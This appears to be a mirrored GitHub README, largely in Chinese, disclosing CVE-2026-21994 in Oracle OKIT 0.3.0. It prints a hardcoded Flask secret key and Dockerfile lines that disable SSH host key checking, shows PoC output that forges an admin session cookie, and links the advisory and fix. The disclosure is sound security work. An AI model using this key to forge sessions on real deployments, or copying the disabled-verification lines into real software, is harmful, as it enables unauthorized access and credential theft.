g0w6y/CVE-2026-21994

GitHub: g0w6y/CVE-2026-21994

CVE-2026-21994 的漏洞披露与 PoC 代码,演示如何利用硬编码密钥和 SSH 配置缺陷实现对 Oracle OKIT 的未授权完全接管。

Stars: 0 | Forks: 0

# CVE-2026-21994 ## 摘要 Oracle OKIT (oci-designer-toolkit) 版本 0.3.0 包含两个严重的配置错误,二者串联可导致未经认证的完全接管。公开代码库中暴露的硬编码 Flask `SECRET_KEY` 允许任何攻击者伪造合法的管理员会话 cookie —— 无需任何凭据。此外,Docker 镜像完全禁用了 SSH 主机验证,使得网络攻击者能够在基础设施部署期间拦截 OCI API 密钥和私钥。 ## 漏洞详情 **1. 硬编码的 `SECRET_KEY` — `okitclassic/okitserver/config.py:4`** ``` SECRET_KEY='8980ffsd675747jjjh' ``` Flask 使用此密钥对会话 cookie 进行签名。由于它被硬编码在公开代码库中,攻击者可以伪造合法的管理员 cookie,并在零凭据的情况下访问 OKIT 仪表板。 **2. SSH 主机验证被禁用 — `Dockerfile:41`** ``` && echo ' StrictHostKeyChecking no' >> /etc/ssh/ssh_config \ && echo ' UserKnownHostsFile=/dev/null' >> /etc/ssh/ssh_config \ ``` 该容器从不检查 SSH 主机指纹。网络攻击者可以对部署过程进行中间人 (MitM) 攻击并窃取 OCI 凭据。 ## PoC 在克隆的代码库目录中运行 `exploit.py`: ``` python3 exploit.py ``` ``` [*] Scanning okitclassic/okitserver/config.py ... [!] VULNERABLE — Hardcoded SECRET_KEY found: 8980ffsd675747jjjh [+] Authentication bypass possible with zero credentials. [*] Scanning Dockerfile ... [!] VULNERABLE — SSH host verification is DISABLED. [+] Network attacker can MitM deployments and steal OCI credentials. [*] Forging admin session cookie ... [!] SUCCESS — Forged cookie: .eJwlzj0OgkAQBeC7bG1... ``` ## 公告 | | | |---|---| | **CVE ID** | [CVE-2026-21994](https://nvd.nist.gov/vuln/detail/CVE-2026-21994) | | **GitHub Advisory** | [GHSA-g6qw-3gmw-m78m](https://github.com/advisories/GHSA-g6qw-3gmw-m78m) | | **CWE** | [CWE-284 — 不当访问控制](https://cwe.mitre.org/data/definitions/284.html) | | **Oracle Advisory Mapping** | [oracle.com/security-alerts/public-vuln-to-advisory-mapping](https://www.oracle.com/security-alerts/public-vuln-to-advisory-mapping.html) | | **Oracle CVE Reference** | [oracle.com/security-alerts/all-oracle-cves](https://www.oracle.com/security-alerts/all-oracle-cves-outside-other-oracle-public-documents.html) | | **Fix** | [oracle/oci-designer-toolkit#780](https://github.com/oracle/oci-designer-toolkit/pull/780) | ## 致谢 由 **Gouri Sankar A** 发现并报告 — [g0w6y](https://github.com/g0w6y)
标签:CVE-2026-21994, CWE-284, Docker安全, Flask, improper access control, Oracle OKIT, Python, SSH配置错误, 中间人攻击, 会话伪造, 安全漏洞, 无后门, 硬编码密钥, 请求拦截, 身份验证绕过, 逆向工具